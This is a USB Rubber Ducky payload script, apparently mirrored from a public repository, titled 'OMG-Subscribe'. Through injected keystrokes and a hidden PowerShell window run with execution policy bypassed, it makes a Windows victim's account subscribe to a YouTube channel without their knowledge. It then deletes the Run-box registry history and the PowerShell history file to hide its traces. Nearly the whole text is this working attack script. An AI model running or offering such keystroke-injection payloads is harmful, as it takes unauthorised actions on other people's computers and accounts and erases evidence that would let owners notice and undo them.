Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/general/-RD-Subscribe/Subscribe.txt
2968 views
1
REM Title: OMG-Subscribe
2
REM Description: This payload is meant to get the owner of the target PC to subscribe to your youtube channel
3
REM Author: I am Jakoby
4
REM Target: Windows 10, 11
5
6
GUI r
7
DELAY 500
8
STRING powershell -w h -NoP -NonI -Exec Bypass Start-Process "
9
10
REM put your youtube link here, you should test it out with mine first though ;D
11
STRING https://www.youtube.com/iamjakoby
12
13
STRING ?sub_confirmation=1"
14
DELAY 500
15
ENTER
16
DELAY 3000
17
TAB
18
DELAY 1000
19
TAB
20
DELAY 1000
21
ENTER
22
DELAY 500
23
ALT F4
24
DELAY 1000
25
GUI r
26
DELAY 500
27
28
REM This will clear their powershell and runbox history
29
30
STRING powershell -w h -NoP -NonI -Exec Bypass reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f; Remove-Item (Get-PSreadlineOption).HistorySavePath
31
DELAY 500
32
ENTER
33
34